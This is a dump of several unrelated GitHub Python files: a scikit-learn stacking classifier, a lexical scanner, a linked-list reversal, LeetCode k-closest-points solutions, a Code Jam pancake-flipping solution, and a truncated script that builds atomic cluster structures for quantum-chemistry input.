\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Momon-dot/Sisben","sub_path":"Program/Brightness_Control.py","file_name":"Brightness_Control.py","file_ext":"py","file_size_in_byte":9855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"1404628071","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Anna Klepova (inspired by Faron from Kaggle)\nhttps://github.com/q0o0p/sklearn-extensions\n\"\"\"\n\nimport sys\nimport random\nimport operator\nimport numpy as np\nfrom copy import deepcopy\nfrom sklearn import cross_validation\nfrom scipy.sparse import csr_matrix, hstack\nfrom sklearn.preprocessing import LabelEncoder\n\n\nclass StackingClassifier:\n\n def __init__(self, **parameters):\n\n self.set_fields_by_default()\n self.set_params(**parameters)\n\n\n def set_fields_by_default(self):\n\n self.version = '0.0.2'\n self.random_state = 0\n self.use_only_primary_clfs_results = True\n self.primary_is_proba = False\n self.label_encoder = LabelEncoder()\n self.classes_ = None\n self.mode_ = None # BINARY or MULTI\n self.primary_answers_choosing_method = 'MEANS' # 'MEANS', 'BEST_CLF', 'RANDOM_CLF'\n\n\n def train_subsets(self, clf, X, y):\n\n nfolds = 5\n if self.mode_ == 'BINARY':\n intermediate_answers = np.zeros((X.shape[0],))\n else:\n assert self.mode_ == 'MULTI'\n intermediate_answers = np.zeros((X.shape[0], len(self.classes_)))\n skf = cross_validation.StratifiedKFold(y,\n n_folds = nfolds,\n shuffle = True,\n random_state = self.random_state)\n clfs = []\n for i, (train_index, test_index) in enumerate(skf):\n x_tr = X[train_index]\n y_tr = y[train_index]\n x_te = X[test_index]\n clf_copy = deepcopy(clf)\n clf_copy.fit(x_tr, y_tr)\n clfs.append(clf_copy)\n if self.primary_is_proba:\n if 'predict_proba' in dir(clf_copy):\n probas = clf_copy.predict_proba(x_te)\n if self.mode_ == 'BINARY':\n intermediate_answers[test_index] = map(operator.itemgetter(1),\n probas)\n else:\n assert self.mode_ == 'MULTI'\n intermediate_answers[test_index] = probas\n elif 'decision_function' in dir(clf_copy):\n scores = clf_copy.decision_function(x_te)\n if self.mode_ == 'BINARY':\n assert type(scores[0]) is np.float64\n else:\n assert self.mode_ == 'MULTI'\n assert type(scores[0]) is np.ndarray\n intermediate_answers[test_index] = scores\n else:\n print >> sys.stderr, 'Error in StackingClassifier: parameter \"primary_is_proba\" is True, however one of primary classifiers has neither \"predict_proba\" method nor \"decision_function\". This classifier is \"{}\"\\n'.format(type(clf_copy))\n exit(1)\n else:\n intermediate_answers[test_index] = clf_copy.predict(x_te)\n\n if self.mode_ == 'BINARY':\n return intermediate_answers.reshape(-1, 1), tuple(clfs)\n else:\n assert self.mode_ == 'MULTI'\n return intermediate_answers, tuple(clfs)\n\n\n def fit(self, X, y):\n\n y_encoded = self.label_encoder.fit_transform(y)\n self.classes_ = self.label_encoder.classes_\n if len(self.classes_) < 2:\n print >> sys.stderr, 'Error in StackingClassifier: There are {} classes. There should be at least 2 classes\\n'\n exit(1)\n elif len(self.classes_) == 2:\n self.mode_ = 'BINARY'\n else:\n self.mode_ = 'MULTI'\n intermediate_answers = dict()\n for i in range(len(self.primary_clfs)):\n if self.primary_clfs[i]['name'] in intermediate_answers:\n print >> sys.stderr, 'Error in StackingClassifier: names of primary classifiers are not unique\\n'\n exit(1)\n (intermediate_answers[self.primary_clfs[i]['name']],\n self.primary_clfs[i]['clfs']) = self.train_subsets(self.primary_clfs[i]['clf'],\n X,\n y_encoded)\n #print \"type(intermediate_answers[self.primary_clfs[i]['name']])\", type(intermediate_answers[self.primary_clfs[i]['name']])\n #print \"intermediate_answers[self.primary_clfs[i]['name']].shape\", intermediate_answers[self.primary_clfs[i]['name']].shape\n if self.mode_ == 'BINARY':\n features = [csr_matrix(intermediate_answers[self.primary_clfs[i]['name']]) for i in range(len(self.primary_clfs))]\n else:\n assert self.mode_ == 'MULTI'\n # [clf1_cls1, clf1_cls2, clf1_cls3, clf2_cls1, clf2_cls2, clf2_cls3,]\n features = [csr_matrix(intermediate_answers[self.primary_clfs[i]['name']][:, class_idx].reshape(-1, 1)) for i in range(len(self.primary_clfs)) for class_idx in range(len(self.classes_))]\n if not self.use_only_primary_clfs_results:\n features = [X] + features\n #print 'len(features)', len(features)\n #print 'features[0].shape in fit', features[0].shape\n X_intermediate = hstack(features)\n #print 'X_intermediate.shape in fit', X_intermediate.shape\n self.clf.fit(X_intermediate, y_encoded)\n #print 'fitted'\n return self\n\n\n def build_matrix_for_prediction(self, X):\n\n nfolds = 5\n intermediate_answers = dict()\n for primary_clf in self.primary_clfs:\n if self.mode_ == 'BINARY':\n intermediate_answers[primary_clf['name']] = np.zeros((X.shape[0],))\n else:\n intermediate_answers[primary_clf['name']] = np.zeros((len(self.classes_), X.shape[0]))\n if self.mode_ == 'BINARY':\n intermediate_answers_skf = np.empty((nfolds, X.shape[0]))\n else:\n assert self.mode_ == 'MULTI'\n intermediate_answers_skf = [np.empty((nfolds, X.shape[0])) for class_idx in range(len(self.classes_))]\n for i in range(nfolds):\n if self.primary_is_proba:\n if 'predict_proba' in dir(primary_clf['clfs'][i]):\n probas = primary_clf['clfs'][i].predict_proba(X)\n if self.mode_ == 'BINARY':\n intermediate_answers_skf[i, :] = map(operator.itemgetter(1), probas)\n else:\n assert self.mode_ == 'MULTI'\n for class_idx in range(len(self.classes_)):\n intermediate_answers_skf[class_idx][i, :] = map(operator.itemgetter(class_idx), probas)\n elif 'decision_function' in dir(primary_clf['clfs'][i]):\n scores = primary_clf['clfs'][i].decision_function(X)\n if self.mode_ == 'BINARY':\n assert type(scores[0]) is np.float64\n intermediate_answers_skf[i, :] = scores\n else:\n assert self.mode_ == 'MULTI'\n assert type(scores[0]) is np.ndarray\n for class_idx in range(len(self.classes_)):\n intermediate_answers_skf[class_idx][i, :] = map(operator.itemgetter(class_idx), scores)\n else:\n print >> sys.stderr, 'Error in StackingClassifier: parameter \"primary_is_proba\" is True, however one of primary classifiers has neither \"predict_proba\" method nor \"decision_function\". This classifier is \"{}\"\\n'.format(type(primary_clf['clfs'][i]))\n exit(1)\n else:\n intermediate_answers_skf[i, :] = primary_clf['clfs'][i].predict(X)\n\n if self.mode_ == 'BINARY':\n intermediate_answers[primary_clf['name']][:] = intermediate_answers_skf.mean(axis=0)\n else:\n assert self.mode_ == 'MULTI'\n if self.primary_answers_choosing_method == 'MEANS':\n for class_idx in range(len(self.classes_)):\n #print 'intermediate_answers_skf[class_idx].shape', intermediate_answers_skf[class_idx].shape\n intermediate_answers[primary_clf['name']][class_idx][:] = intermediate_answers_skf[class_idx].mean(axis = 0)\n elif self.primary_answers_choosing_method == 'BEST_CLF':\n for object_idx in range(X.shape[0]):\n sorted_values = []\n for class_idx in range(len(self.classes_)):\n values = []\n for fold_idx in range(nfolds):\n values.append(intermediate_answers_skf[class_idx][fold_idx][object_idx])\n sorted_values.append(sorted(values))\n tuple_scores = []\n max_score = None\n max_score_tuple = None\n for fold_idx in range(nfolds):\n score = 0\n for class_idx in range(len(self.classes_)):\n curr_sorted_values = sorted_values[class_idx]\n val = intermediate_answers_skf[class_idx][fold_idx][object_idx]\n for i in range((nfolds + 1) / 2):\n if val == curr_sorted_values[i] or \\\n val == curr_sorted_values[nfolds - 1 - i]:\n score += 10 ** i\n tuple_scores.append(score)\n if max_score is None or score > max_score:\n max_score = score\n max_score_tuple = [intermediate_answers_skf[class_idx][fold_idx][object_idx] for class_idx in range(len(self.classes_))]\n for class_idx in range(len(self.classes_)):\n intermediate_answers[primary_clf['name']][class_idx][object_idx] = max_score_tuple[class_idx]\n else:\n assert self.primary_answers_choosing_method == 'RANDOM_CLF'\n for object_idx in range(X.shape[0]):\n random_fold = random.randint(1, 5) - 1\n max_score_tuple = [intermediate_answers_skf[class_idx][random_fold][object_idx] for class_idx in range(len(self.classes_))]\n for class_idx in range(len(self.classes_)):\n intermediate_answers[primary_clf['name']][class_idx][object_idx] = max_score_tuple[class_idx]\n #print \"intermediate_answers[primary_clf['name']].shape in build_matrix_for_prediction\", intermediate_answers[primary_clf['name']].shape\n if self.mode_ == 'BINARY' or not self.primary_is_proba:\n features = [csr_matrix(intermediate_answers[primary_clf['name']].reshape(-1, 1)) for primary_clf in self.primary_clfs]\n else:\n assert self.mode_ == 'MULTI'\n features = [csr_matrix(intermediate_answers[primary_clf['name']][class_idx].reshape(-1, 1)) for primary_clf in self.primary_clfs for class_idx in range(len(self.classes_))]\n #print 'len(features) in build_matrix_for_prediction', len(features)\n #print 'features[0].shape in build_matrix_for_prediction', features[0].shape\n if not self.use_only_primary_clfs_results:\n features = [X] + features\n X_intermediate = hstack(features)\n return X_intermediate\n \n \n def predict(self, X):\n \n X_intermediate = self.build_matrix_for_prediction(X)\n predicted = self.clf.predict(X_intermediate)\n return self.label_encoder.inverse_transform(predicted)\n\n\n def predict_proba(self, X):\n \n X_intermediate = self.build_matrix_for_prediction(X)\n predicted = self.clf.predict_proba(X_intermediate)\n return predicted\n\n\n def get_params(self, deep = True):\n \n params = {'primary_clfs': self.primary_clfs,\n 'clf': self.clf,\n 'use_only_primary_clfs_results': self.use_only_primary_clfs_results,\n 'primary_is_proba': self.primary_is_proba,\n 'label_encoder': self.label_encoder,\n 'classes_': self.classes_,\n 'mode_': self.mode_,\n 'version': self.version,\n 'primary_answers_choosing_method': self.primary_answers_choosing_method}\n for i in range(len(self.primary_clfs)):\n primary_clf_params = self.primary_clfs[i]['clf'].get_params()\n for k in primary_clf_params:\n params['primary__{}__{}'.format(self.primary_clfs[i]['name'], k)] = primary_clf_params[k]\n clf_params = self.clf.get_params()\n for k in clf_params:\n params['clf__{}'.format(k)] = clf_params[k]\n return params\n \n \n def set_params(self, **parameters):\n \n for param, value in parameters.items():\n if param == 'primary_clfs':\n if value is not None:\n assert type(value) is list\n self.primary_clfs = value\n if param == 'clf':\n if value is not None:\n self.clf = value\n if param == 'random_state':\n if value is not None:\n self.random_state = value\n if param == 'use_only_primary_clfs_results':\n if value is not None:\n self.use_only_primary_clfs_results = value\n if param == 'primary_is_proba':\n if value is not None:\n self.primary_is_proba = value\n if param == 'label_encoder':\n if value is not None:\n self.label_encoder = value\n if param == 'classes_':\n if value is not None:\n self.classes_ = value\n if param == 'mode_':\n if value is not None:\n self.mode_ = value\n if param == 'version':\n if value is not None:\n self.version = value\n if param == 'primary_answers_choosing_method':\n if value is not None:\n self.primary_answers_choosing_method = value\n primary_clf_indices = dict()\n for i in range(len(self.primary_clfs)):\n primary_clf_indices[self.primary_clfs[i]['name']] = i\n primary_clf_new_params = dict()\n clf_new_params = dict()\n for param, value in parameters.items():\n splitted = param.split('__')\n if len(splitted) > 2:\n if splitted[0] == 'primary' and splitted[1] in primary_clf_indices:\n if splitted[1] not in primary_clf_new_params:\n primary_clf_new_params[splitted[1]] = dict()\n primary_clf_new_params[splitted[1]]['__'.join(splitted[2:])] = value\n elif splitted[0] == 'clf':\n clf_new_params['__'.join(splitted[1:])] = value\n else:\n raise 'Error in StackingClassifier.set_params: wrong parameter name: {}\\n'.format(param)\n for clf_name in primary_clf_new_params:\n self.primary_clfs[primary_clf_indices[clf_name]]['clf'].set_params(**(primary_clf_new_params[clf_name]))\n self.clf.set_params(**clf_new_params)\n return self\n\n\n","repo_name":"q0o0p/sklearn-extensions","sub_path":"stacking_classifier.py","file_name":"stacking_classifier.py","file_ext":"py","file_size_in_byte":15697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"74920338434","text":"from scanner.file_reader import FileReader\nfrom scanner.regex import Regex\nfrom scanner.state import FinalState, State, ErrorState\nfrom scanner.file_writer import FileWriter\nfrom scanner.interval import Interval, OtherTypeInterval\n\n\nclass Scanenr:\n def __init__(self, address, symbol):\n self.fr = FileReader(path=address)\n self.fw = FileWriter(symbol)\n self.regex_ = Regex()\n # self.current_state = self.regex_.state_zero\n\n def get_token(self):\n current_state = self.regex_.state_zero\n while not self.fr.is_last_line:\n if self.fr.current_char == len(self.fr.backup_line) - 1:\n self.fr.load_backup_line()\n if not self.fr.is_last_line:\n x = self.fr.forward_read()\n else:\n x = \"♤\"\n\n if current_state.stateID == \"0\" and x == \"♤\":\n break\n current_state = current_state.get_next_state(x)\n if isinstance(current_state, FinalState):\n if current_state.is_backward() and x != \"♤\":\n self.fr.backward_read()\n token = self.fr.return_token() # it must'nt delete\n if current_state.stateID != 'f' and current_state.stateID != 'c':\n state_id = current_state.__str__()\n if x == \"♤\":\n token = current_state.str1\n if state_id == \"KEYWORD\":\n self.fw.add_symbol_to_symbol_table(token)\n if not State.is_keyword(token):\n state_id = \"ID\"\n self.fw.tokens_writer(self.fr.current_line, state_id, token)\n return self.fr.current_line, state_id, token\n\n current_state = self.regex_.state_zero\n if isinstance(current_state, ErrorState):\n if current_state.is_backward():\n self.fr.backward_read()\n ErrorState.noError = False\n errorType = current_state.typeError()\n errorToken = self.fr.return_token() #\n line_number = self.fr.current_line\n if current_state.stateID == \"e2\":\n str_tmp = \"\"\n i = -2\n for char in current_state.str1:\n if i == 5:\n str_tmp += \"...\"\n i += 1\n if char == \"\\n\":\n if i < 6:\n str_tmp += \"\\\\n\"\n line_number -= 1\n elif i < 6:\n str_tmp += char\n self.fw.lexical_errors(line_number, errorType, str_tmp)\n else:\n self.fw.lexical_errors(line_number, errorType, errorToken)\n current_state = self.regex_.state_zero\n\n self.fw.tokens_writer(self.fr.current_line+1, \"\", \"♤\")\n # write_symbol_table()\n self.fw.lexical_error_write()\n return self.fr.current_line, \"\", \"♤\"\n","repo_name":"alimohammadiamirhossein/cminus","sub_path":"scanner/scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"27146015608","text":"\r\nclass Node:\r\n\tdef __init__(self, data):\r\n\t\tself.data = data\r\n\t\tself.next = None\r\n\r\ndef getNode(data):\r\n\t# allocating node\r\n\tnew_node = Node(0)\r\n\tnew_node.data = data\r\n\tnew_node.next = new_node.prev = None\r\n\treturn new_node\r\n\r\ndef push(head, new_node):\r\n\tnew_node.prev = None\r\n\tnew_node.next = head\r\n\tif ((head) != None):\r\n\t\thead.prev = new_node\r\n\thead = new_node\r\n\treturn head\r\n\r\ndef printList(head):\r\n\twhile (head):\r\n\t\tprint(head.data, end=\" \")\r\n\t\thead = head.next\r\n\r\ndef revListInGroupOfGivenSize(head, k):\r\n\tif head is None:\r\n\t\treturn head\r\n\tst = head\r\n\tglobprev, ans = None, None\r\n\twhile (st != None):\r\n\t\tcount = 1\r\n\t\tcurr = st\r\n\t\tprev, next_node = None, None\r\n\t\twhile (curr != None and count <= k):\r\n\t\t\tnext_node = curr.next\r\n\t\t\tcurr.prev = next_node\r\n\t\t\tcurr.next = prev\r\n\t\t\tprev = curr\r\n\t\t\tcurr = next_node\r\n\t\t\tcount += 1\r\n\t\tif ans is None:\r\n\t\t\tans = prev\r\n\t\t\tans.prev = None\r\n\t\tif globprev is None:\r\n\t\t\tglobprev = st\r\n\t\telse:\r\n\t\t\tglobprev.next = prev\r\n\t\t\tprev.prev = globprev\r\n\t\t\tglobprev = st\r\n\t\tst = curr\r\n\treturn ans\r\n\r\nhead = None\r\nhead = push(head, getNode(2))\r\nhead = push(head, getNode(4))\r\nhead = push(head, getNode(8))\r\nhead = push(head, getNode(10))\r\nprint(\"Original list:\", end=\" \")\r\nprintList(head)\r\nk = 2\r\nhead = revListInGroupOfGivenSize(head, k)\r\nprint(\"\\nModified list:\", end=\" \")\r\nprintList(head)\r\n\r\n","repo_name":"shrutii2/Linked-List-in-Python","sub_path":"rotatedllingrpofgivensize.py","file_name":"rotatedllingrpofgivensize.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"72324686273","text":"import heapq\nfrom typing import List\n# 10.03 first try,自己的解,能跑过test \n# # case但是submit超时,因为太多重复iteration了,属实没有必要\nclass Solution:\n def kClosest(self, points: list[list[int]], k: int) -> list[list[int]]:\n distance = {}\n for i in range(len(points)):\n point = points[i]\n if len(distance) < k:\n distance[i] = point[0]**2 + point[1]**2\n else:\n cur_max_distance = max(distance.values())\n if point[0]**2 + point[1]**2 < cur_max_distance:\n del distance[max(distance, key = distance.get)]\n distance[i] = point[0]**2 + point[1]**2\n else:\n pass\n res_keys = distance.keys()\n res = [points[i] for i in res_keys]\n return res\n\n\n# 其实全部算一遍然后sort就好了,for loop O(n), sort O(nlog(n))\nclass Solution:\n def kClosest(self, points: list[list[int]], k: int) -> list[list[int]]:\n res = []\n for x, y in points:\n dist = x ** 2 + y ** 2\n res.append([dist, x, y])\n res.sort(key = lambda e: e[0])\n res = [[x, y] for d, x, y in res[0:k]]\n return res\n\n\n# neetcode 用的heap应该会比sort稍微efficient一点点\nclass Solution:\n def kClosest(self, points: list[list[int]], k: int) -> list[list[int]]:\n pts = []\n for x, y in points:\n dist = (abs(x - 0) ** 2) + (abs(y - 0) ** 2)\n pts.append([dist, x, y])\n\n res = []\n heapq.heapify(pts)\n for _ in range(k):\n dist, x, y = heapq.heappop(pts)\n res.append([x, y])\n return res\n\n# 11.10 复习自己写,min heap是O(nlogn),因为heap长度等于 points length,但是如果用长度为k的max heap,T会被缩减为 O(nlogk). 在k比n小很多的情况下会更优\nclass Solution:\n def kClosest(self, points: List[List[int]], k: int) -> List[List[int]]:\n heap = []\n res = []\n\n for point in points:\n x, y = point[0], point[1]\n heapq.heappush(heap, (x**2 + y**2, point)) #像neet code那样全部保存起来然后heapify更好,因为heapify一次只要O(n)但是push n次需要n * logn(每次push的花费)\n \n while k:\n res.append(heapq.heappop(heap)[1])\n k -= 1\n \n return res\n\n# 用max heap重写了一遍\nclass Solution:\n def kClosest(self, points: List[List[int]], k: int) -> List[List[int]]:\n heap = [] # max heap with max len = k\n\n for x, y in points:\n dist = x ** 2 + y ** 2\n if len(heap) == k:\n if -1 * heap[0][0] > dist:\n heapq.heappop(heap)\n else:\n continue\n heapq.heappush(heap, (-dist, [x, y]))\n \n return [point[1] for point in heap]\n\n# 去做215之后用quick select重写了一遍。这个答案能pass 86 out of 87 cases,在最后k = 5k的时候TLE了。但是知道有这个解法还是很重要的\n# - Best Case: O(n)\n# - Average Case: O(n)\n# - Worst Case: O(n^2)\nclass Solution:\n def kClosest(self, points: List[List[int]], k: int) -> List[List[int]]:\n \n def partition(ls, left, right):\n fill, pivot = left, ls[right]\n for i in range(left, right):\n ls_distance = ls[i][0] ** 2 + ls[i][1] ** 2\n pivot_distance = pivot[0] ** 2 + pivot[1] ** 2\n if ls_distance <= pivot_distance:\n ls[i], ls[fill] = ls[fill], ls[i]\n fill += 1\n ls[fill], ls[right] = ls[right], ls[fill]\n return fill\n \n l, r = 0, len(points) - 1\n while l < r:\n fill = partition(points, l, r)\n if fill > k:\n r = fill - 1\n elif fill < k:\n l = fill + 1\n else:\n break\n \n return [[x, y] for x, y in points[:k]]\n\n\n# 1.9 复习,不明白为啥这题是medium,好像很简单?\nclass Solution:\n def kClosest(self, points: List[List[int]], k: int) -> List[List[int]]:\n hp = []\n res = []\n\n for x, y in points:\n d = x ** 2 + y ** 2\n hp.append([d, x, y])\n heapq.heapify(hp)\n while k > 0:\n _, x, y = heapq.heappop(hp)\n res.append([x, y])\n k -= 1\n return res\n \n ","repo_name":"deezeey/LC","sub_path":"src/solutions/973_kClosestPointsToOrigin.py","file_name":"973_kClosestPointsToOrigin.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23496037991","text":"import os\n\nfile_path_input = os.getcwd() + '/' + 'prob2.in'\nfile_path_output = os.getcwd() + '/' + 'prob2.out'\n\nwith open(file_path_output, 'wb') as output_data:\n\twith open(file_path_input, 'rb') as input_data:\n\t\t\tnum_cases = int(input_data.readline())\n\n\t\t\tfor i in range(num_cases):\n\t\t\t\tcurr_stack = list(input_data.readline().decode())\n\t\t\t\ttry:\n\t\t\t\t\tcurr_stack.remove('\\n')\n\t\t\t\texcept: \n\t\t\t\t\tnothing = 1\n\n\t\t\t\tif len(curr_stack) == 1:\n\t\t\t\t\tif curr_stack[0] == '-':\n\t\t\t\t\t\tout_line = 'Case #' + str(i+1) + ': 1\\n' \n\t\t\t\t\t\toutput_data.write(out_line.encode())\n\t\t\t\t\telse:\n\t\t\t\t\t\tout_line = 'Case #' + str(i+1) + ': 0\\n'\n\t\t\t\t\t\toutput_data.write(out_line.encode())\n\n\t\t\t\telse:\n\t\t\t\t\titer1 = 0\n\t\t\t\t\titer2 = 1\n\t\t\t\t\tcount = 0\n\t\t\t\t\twhile '-' in curr_stack:\n\t\t\t\t\t\tif '+' not in curr_stack:\n\t\t\t\t\t\t\tcount += 1\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\twhile curr_stack[iter1] == curr_stack[iter2]:\n\t\t\t\t\t\t\tif iter2 <= len(curr_stack)-2:\n\t\t\t\t\t\t\t\titer1 += 1\n\t\t\t\t\t\t\t\titer2 += 1\n\n\t\t\t\t\t\tif curr_stack[iter1] == '-':\n\t\t\t\t\t\t\tfor j in range(iter2):\n\t\t\t\t\t\t\t\tcurr_stack[j] = '+'\n\t\t\t\t\t\t\tcount += 1\n\t\t\t\t\t\t\tprev = '+'\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tfor j in range(iter2):\n\t\t\t\t\t\t\t\tcurr_stack[j] = '-'\n\t\t\t\t\t\t\tcount += 1\n\t\t\t\t\t\t\tprev = '-'\n\n\t\t\t\t\tout_line = 'Case #' + str(i+1) + ': ' + str(count) + '\\n'\n\t\t\t\t\toutput_data.write(out_line.encode())\n\n\tinput_data.close()\noutput_data.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_178/2759.py","file_name":"2759.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"34025714816","text":"#!/usr/bin/env python3.5\r\n# -*- coding: utf-8 -*-\r\n\r\n__author__ = 'Weiguo Jing'\r\n__version__ = \"2.0.0\"\r\n\r\n\r\nfrom method.read import poscar\r\nfrom method.structure import Structure\r\nfrom method.atom import Atom\r\nimport numpy as np\r\n\r\n\r\ndef structure_species(structure):\r\n from method.defect import specieset\r\n atoms_type = specieset(structure)\r\n species = {}\r\n for name in atoms_type:\r\n count = 0\r\n for atom in structure:\r\n if atom.type == name:\r\n count += 1\r\n species[name] = count\r\n return sorted(species.items(), key=lambda item: item[1])\r\n\r\n\r\ndef distance_of_center_and_surface(center, cell):\r\n norm_v_ab = np.cross(cell[0], cell[1])/np.linalg.norm(np.cross(cell[0], cell[1]))\r\n norm_v_bc = np.cross(cell[1], cell[2])/np.linalg.norm(np.cross(cell[1], cell[2]))\r\n norm_v_ca = np.cross(cell[2], cell[0])/np.linalg.norm(np.cross(cell[2], cell[0]))\r\n distance_ab = abs(np.dot(center, norm_v_ab))\r\n distance_bc = abs(np.dot(center, norm_v_bc))\r\n distance_ca = abs(np.dot(center, norm_v_ca))\r\n return distance_ab, distance_bc, distance_ca\r\n\r\n\r\ndef build_cluster(structure, cluster_r, doped_atom_type=None, center=None, core_r=None, tolerance=0.2):\r\n from method.coordination_shells import coordination_shells\r\n\r\n position = np.array([0.0, 0.0, 0.0])\r\n species = structure_species(structure)\r\n if doped_atom_type is None:\r\n doped_atom_type = species[0][0]\r\n print('\\nTry to use *{0}* atoms as doped atoms\\n'.format(doped_atom_type))\r\n if center is None:\r\n num = 0\r\n for atom in structure:\r\n if atom.type == doped_atom_type:\r\n position += atom.pos\r\n num += 1\r\n center = position/num\r\n if cluster_r > min(distance_of_center_and_surface(center, structure.cell.T)):\r\n print('\\nERROR: the cluster is out range of the CONTCAR supercell structure. '\r\n 'Please use a bigger supercell or a smaller cluster_r parameter\\n')\r\n exit(1)\r\n\r\n cluster = Structure(structure.cell, scale=structure.scale)\r\n if core_r is None:\r\n print('\\nTry to use the nearest neighbor of doped atoms to build core structure.\\n')\r\n nearest_neighbors = []\r\n for atom in structure:\r\n if atom.type == doped_atom_type:\r\n neighbors = coordination_shells(structure, nshells=5, center=atom.pos, tolerance=tolerance)\r\n nearest_neighbors.append(atom)\r\n atom.pseudo = 0\r\n for item in neighbors[0]:\r\n atom = item[0]\r\n nearest_neighbors.append(atom)\r\n atom.pseudo = 0\r\n atom = neighbors[0][0][0]\r\n nearest_name = atom.type\r\n print('\\nSet *{0}* atoms as nearest neighbor.\\n'.format(nearest_name))\r\n flag = 0\r\n for i in range(1, 5):\r\n temp = []\r\n for item in neighbors[i]:\r\n if flag != 0:\r\n break\r\n atom = item[0]\r\n if nearest_name == atom.type:\r\n if not hasattr(atom, 'pseudo'):\r\n temp.append(atom)\r\n atom.pseudo = 0\r\n else:\r\n flag = 1\r\n nearest_neighbors.extend(temp)\r\n # nearest neighbor might be outside of CONTCAR\r\n with open('core structure.txt', 'w+') as fp:\r\n for atom in nearest_neighbors:\r\n fp.writelines(atom.type+' '+str(atom.pos)+'\\n')\r\n for atom in structure:\r\n position = atom.pos\r\n d = np.linalg.norm(center - position)\r\n if d <= cluster_r:\r\n if hasattr(atom, 'pseudo'):\r\n cluster.append(Atom(atom.pos - center, atom.type, pseudo=0))\r\n else:\r\n cluster.append(Atom(atom.pos - center, atom.type, pseudo=-1))\r\n else:\r\n for atom in structure:\r\n d = np.linalg.norm(center - atom.pos)\r\n if d <= core_r:\r\n cluster.append(Atom(atom.pos - center, atom.type, pseudo=0))\r\n elif d <= cluster_r:\r\n cluster.append(Atom(atom.pos - center, atom.type, pseudo=-1))\r\n return cluster, center\r\n\r\n\r\ndef cluster_from_substrate(host, center, cluster_r):\r\n temp = []\r\n for atom in host:\r\n position = atom.pos\r\n d = np.linalg.norm(center - position)\r\n if d <= cluster_r:\r\n temp.append(atom)\r\n return temp\r\n\r\n\r\ndef remove_doped_atoms(structure, remove_dict):\r\n temp = []\r\n for atom in structure:\r\n if atom.type in remove_dict.keys():\r\n value = remove_dict[atom.type]\r\n if value != '':\r\n temp.append(Atom(atom.pos, value))\r\n else:\r\n temp.append(Atom(atom.pos, atom.type))\r\n new_structure = Structure(structure.cell, scale=structure.scale)\r\n new_structure.extend(temp)\r\n return new_structure\r\n\r\n\r\ndef extend_structure(structure, shell_r):\r\n cell = structure.cell.T\r\n volume = structure.volume\r\n hz = volume/np.linalg.norm(np.cross(cell[0], cell[1]))\r\n hx = volume/np.linalg.norm(np.cross(cell[1], cell[2]))\r\n hy = volume/np.linalg.norm(np.cross(cell[2], cell[0]))\r\n if min(hx, hy, hz)/2 >= shell_r:\r\n return structure\r\n nz = int(np.ceil(shell_r/hz - 0.5))\r\n nx = int(np.ceil(shell_r/hx - 0.5))\r\n ny = int(np.ceil(shell_r/hy - 0.5))\r\n temp = []\r\n for i in range(-nx, nx+1):\r\n for j in range(-ny, ny+1):\r\n for k in range(-nz, nz+1):\r\n for atom in structure:\r\n position = atom.pos + i*cell[0] + j*cell[1] + k*cell[2]\r\n temp.append(Atom(position, atom.type))\r\n supercell = Structure(structure.cell, scale=structure.scale)\r\n supercell.extend(temp)\r\n return supercell\r\n\r\n\r\ndef build_shell(structure, center, cluster_r, shell_r, pure_substrate=False, remove_dict=None):\r\n\r\n if pure_substrate is False:\r\n if remove_dict is None:\r\n print('ERROR: remove_list can not be None when substrate includes doped atoms.\\n')\r\n exit(1)\r\n structure = remove_doped_atoms(structure, remove_dict)\r\n supercell = extend_structure(structure, shell_r)\r\n shell = Structure(structure.cell, scale=structure.scale)\r\n temp = []\r\n for atom in supercell:\r\n position = atom.pos\r\n d = np.linalg.norm(position - center)\r\n if cluster_r < d <= shell_r:\r\n temp.append(Atom(position - center, atom.type))\r\n shell.extend(temp)\r\n return shell\r\n\r\n\r\ndef build_mosaic_structure(cluster, shell):\r\n for atom in shell:\r\n cluster.append(Atom(atom.pos, atom.type, pseudo=-1))\r\n return cluster\r\n\r\n\r\ndef write_seward_input(structure, core_pseudo, mosaic_pseudo, charge, mosaic_r, file_name='1_sew.in', title=None):\r\n core = {}\r\n mosaic = {}\r\n count = 0\r\n for key in core_pseudo:\r\n core[key] = []\r\n for key in mosaic_pseudo:\r\n mosaic[key] = []\r\n ion = []\r\n for atom in structure:\r\n if atom.pseudo == 0:\r\n try:\r\n core[atom.type].append(atom)\r\n except KeyError:\r\n print('ERROR: Core pseudo potential do not include the information about {0}\\n'.format(atom.type))\r\n exit(1)\r\n finally:\r\n count += 1\r\n elif np.linalg.norm(atom.pos) <= mosaic_r:\r\n try:\r\n mosaic[atom.type].append(atom)\r\n except KeyError:\r\n print('ERROR: mosaic pseudo potential do not include the information about {0}\\n'.format(atom.type))\r\n exit(1)\r\n finally:\r\n count += 1\r\n else:\r\n ion.append(atom)\r\n string = \" &SEWARD &END\\nTitle\\n{0}\\n\".format(title)\r\n for key in core.keys():\r\n temp = \"Basis set\\n{0}\\n\".format(core_pseudo[key])\r\n i = 1\r\n for atom in core[key]:\r\n temp = temp + \"{name}{num}{pos0}{pos1}{pos2} Angstrom \\n\".format(name=atom.type, num='{:<6d}'.format(i),\r\n pos0='{:10.4f}'.format(atom.pos[0]),\r\n pos1='{:10.4f}'.format(atom.pos[1]),\r\n pos2='{:10.4f}'.format(atom.pos[2]))\r\n i += 1\r\n temp = temp + \"End of basis\\n********************************************\\n\"\r\n string = string + temp\r\n abc_code = 65\r\n for key in mosaic.keys():\r\n temp = \"Basis set\\n{0}\\n\".format(mosaic_pseudo[key])\r\n i = 1\r\n for atom in mosaic[key]:\r\n 